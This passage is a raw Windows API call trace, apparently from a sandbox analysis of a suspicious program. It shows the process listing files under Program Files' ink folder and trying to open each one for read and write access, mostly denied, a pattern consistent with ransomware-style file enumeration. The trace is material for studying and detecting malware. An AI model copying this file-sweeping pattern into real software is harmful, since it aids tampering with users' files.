AreFileApisANSI () returned 1 [0085.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ecf0 [0085.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe") returned 62 [0085.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.788] GetLastError () returned 0x5 [0085.788] GetLastError () returned 0x5 [0085.789] SetLastError (dwErrCode=0x5) [0085.789] GetLastError () returned 0x5 [0085.789] SetLastError (dwErrCode=0x5) [0085.789] GetLastError () returned 0x5 [0085.789] SetLastError (dwErrCode=0x5) [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0085.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.789] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8602, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="th-TH", cAlternateFileName="")) returned 1 [0085.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0085.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0085.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0085.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0085.789] AreFileApisANSI () returned 1 [0085.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH", lpUsedDefaultChar=0x0) returned 57 [0085.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0085.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.790] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.790] AreFileApisANSI () returned 1 [0085.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0085.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH") returned 57 [0085.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.790] GetLastError () returned 0x5 [0085.790] GetLastError () returned 0x5 [0085.790] SetLastError (dwErrCode=0x5) [0085.790] GetLastError () returned 0x5 [0085.790] SetLastError (dwErrCode=0x5) [0085.790] GetLastError () returned 0x5 [0085.790] SetLastError (dwErrCode=0x5) [0085.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0085.790] AreFileApisANSI () returned 1 [0085.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0085.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0085.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH") returned 57 [0085.791] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.791] GetLastError () returned 0x5 [0085.791] GetLastError () returned 0x5 [0085.791] SetLastError (dwErrCode=0x5) [0085.791] GetLastError () returned 0x5 [0085.791] SetLastError (dwErrCode=0x5) [0085.791] GetLastError () returned 0x5 [0085.791] SetLastError (dwErrCode=0x5) [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0085.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0085.791] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x109400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0085.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0085.792] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0085.792] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8602, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.792] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0085.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0085.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0085.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.793] AreFileApisANSI () returned 1 [0085.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0085.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0085.793] AreFileApisANSI () returned 1 [0085.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85940 [0085.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui") returned 73 [0085.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0085.793] GetFileType (hFile=0x360) returned 0x1 [0085.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0085.794] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.794] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.794] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.794] CloseHandle (hObject=0x360) returned 1 [0085.794] AreFileApisANSI () returned 1 [0085.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85440 [0085.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui") returned 73 [0085.794] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.794] GetLastError () returned 0x5 [0085.795] GetLastError () returned 0x5 [0085.795] SetLastError (dwErrCode=0x5) [0085.795] GetLastError () returned 0x5 [0085.795] SetLastError (dwErrCode=0x5) [0085.795] GetLastError () returned 0x5 [0085.795] SetLastError (dwErrCode=0x5) [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0085.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.795] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓☀")) returned 0 [0085.795] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0085.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0085.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0085.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0085.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0085.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0085.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0085.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0085.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.796] AreFileApisANSI () returned 1 [0085.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft 